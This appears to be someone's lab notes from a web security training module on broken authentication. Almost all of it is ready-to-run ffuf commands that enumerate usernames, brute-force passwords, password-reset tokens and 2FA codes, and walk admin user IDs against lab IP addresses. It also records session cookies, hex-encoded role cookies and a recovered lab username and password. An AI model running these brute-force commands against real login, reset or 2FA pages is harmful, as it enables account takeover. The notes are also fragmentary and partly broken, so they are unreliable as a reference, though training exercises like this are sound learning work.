# Broken Authentication

## Enumerating Users

ffuf -w /opt/useful/seclists/Usernames/xato-net-10-million-usernames.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"

94.237.59.119:54491

ffuf -w /opt/useful/seclists/Usernames/xato-net-10-million-usernames.txt -u http://94.237.59.119:54491/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"

## Brute-Forcing Passwords

grep '[[:upper:]]' /usr/share/wordlists/rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '.{10}' > custom_wordlist.txt

94.237.55.98:31173
ffuf -w ./custom_wordlist.txt -u http://94.237.55.98:31173/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=admin&password=FUZZ" -fr "Invalid username"

## Brute-Forcing Password Reset Token

seq -w 0 9999 > tokens.txt

ffuf -w ./tokens.txt -u http://94.237.60.154:47607/reset_password.php?token=FUZZ -fr "The provided token is invalid"

## Brute-Forcing 2fa codes

ffuf -w ./tokens.txt -u http://94.237.62.147:47987/2fa.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=gnpl9fatno1bhbegjdirvk70p4" -d "otp=FUZZ" -fr "Invalid 2FA Code

### Authentication Bypass via Parameter Modification

seq -w 0 999 > user_ids.txt

ffuf -w ./user_ids.txt -u http://94.237.51.81:46189/admin.php?user_id=FUZZ -fr "Could not load admin data"


75736572 3d 6874622d7374646e743b726f6c653d 75736572
75736572 3d 6874622d7374646e743b726f6c653d 75736572

### assessemtn

created user

test q97hjg2khvl28mucpu7r8h6kb8
admin q97hjg2khvl28mucpu7r8h6kb8
root q97hjg2khvl28mucpu7r8h6kb8

atleast 12 characters no special, atlease 1 number, lower, and upper
0123456789aB




ffuf -w ./xato-net-10-million-usernames.txt -u http://94.237.62.166:45749/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown username or password"

username is gladys
password is dWinaldasD13

ffuf -w tokens.txt -u http://94.237.63.109:42328/2fa.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=f782dbv49aq0fb6o0iutruripj" -d "otp=FUZZ" -fr "Invalid OTP"
Test0123456789